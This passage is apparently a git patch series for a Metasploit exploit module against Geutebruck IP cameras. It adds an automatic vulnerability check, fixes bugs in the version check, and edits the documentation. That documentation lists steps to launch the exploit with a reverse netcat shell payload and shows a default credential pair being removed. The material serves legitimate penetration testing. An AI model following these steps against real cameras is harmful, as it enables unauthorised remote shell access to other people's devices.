are vulnerable before attempting to exploit them. --- modules/exploits/linux/http/geutebruck_testaction_exec.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/modules/exploits/linux/http/geutebruck_testaction_exec.rb b/modules/exploits/linux/http/geutebruck_testaction_exec.rb index a268d10af6..04c16eb58a 100644 --- a/modules/exploits/linux/http/geutebruck_testaction_exec.rb +++ b/modules/exploits/linux/http/geutebruck_testaction_exec.rb @@ -7,6 +7,7 @@ class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager + prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( From 1da359ee01cf1cead2ac3ed42c7d6c51cfaa8180 Mon Sep 17 00:00:00 2001 From: gwillcox-r7 Date: Fri, 14 Aug 2020 17:49:02 -0500 Subject: [PATCH 18/20] Merge with last fix. This fix just fixes a issue with a method call as I tried calling the nonexistant method .true? --- modules/exploits/linux/http/geutebruck_testaction_exec.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/linux/http/geutebruck_testaction_exec.rb b/modules/exploits/linux/http/geutebruck_testaction_exec.rb index 04c16eb58a..f1490bf604 100644 --- a/modules/exploits/linux/http/geutebruck_testaction_exec.rb +++ b/modules/exploits/linux/http/geutebruck_testaction_exec.rb @@ -77,7 +77,7 @@ class MetasploitModule < Msf::Exploit::Remote def check result = firmware - return result unless result.true? + return result unless result == true version = Gem::Version.new(@version) vprint_status "Found Geutebruck version #{version}" From 93fa66bfc557a9bc34c33cbf80622c64e405e5b3 Mon Sep 17 00:00:00 2001 From: ddouhine Date: Sat, 15 Aug 2020 00:56:53 +0200 Subject: [PATCH 19/20] Update geutebruck_testaction_exec.rb And a fix for the fix ;) I guess now everything will work as intended ! --- modules/exploits/linux/http/geutebruck_testaction_exec.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/linux/http/geutebruck_testaction_exec.rb b/modules/exploits/linux/http/geutebruck_testaction_exec.rb index f1490bf604..616928e2df 100644 --- a/modules/exploits/linux/http/geutebruck_testaction_exec.rb +++ b/modules/exploits/linux/http/geutebruck_testaction_exec.rb @@ -81,7 +81,7 @@ class MetasploitModule < Msf::Exploit::Remote version = Gem::Version.new(@version) vprint_status "Found Geutebruck version #{version}" - if version < Gem::Version.new('1.12.0.25') || Gem::Version.new('1.12.13.2') || version == Gem::Version.new('1.12.14.5') + if version < Gem::Version.new('1.12.0.25') || version == Gem::Version.new('1.12.13.2') || version == Gem::Version.new('1.12.14.5') return CheckCode::Appears end From 8f80d9b8b6b093e0856c15c5f34b4d2387efde85 Mon Sep 17 00:00:00 2001 From: gwillcox-r7 Date: Mon, 17 Aug 2020 09:12:02 -0500 Subject: [PATCH 20/20] Minor updates to the documentation to reflect the fact that the username and password could be something other than root/admin --- .../modules/exploit/linux/http/geutebruck_testaction_exec.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/documentation/modules/exploit/linux/http/geutebruck_testaction_exec.md b/documentation/modules/exploit/linux/http/geutebruck_testaction_exec.md index ab009e1823..0ebb8d378d 100644 --- a/documentation/modules/exploit/linux/http/geutebruck_testaction_exec.md +++ b/documentation/modules/exploit/linux/http/geutebruck_testaction_exec.md @@ -42,8 +42,8 @@ Users can find additional details of this vulnerability on the advisory page at 1. Start the camera using default configuration 2. Launch msfconsole 3. Do: `use exploit/linux/http/geutebruck_testaction_exec` - 4. Do: `set httpusername root` - 5. Do: `set httppassword admin` + 4. Do: `set httpusername ` + 5. Do: `set httppassword ` 6. Do: `set lhost ` 5. Do: `set rhosts ` 6. Do: `set payload cmd/unix/reverse_netcat_gaping`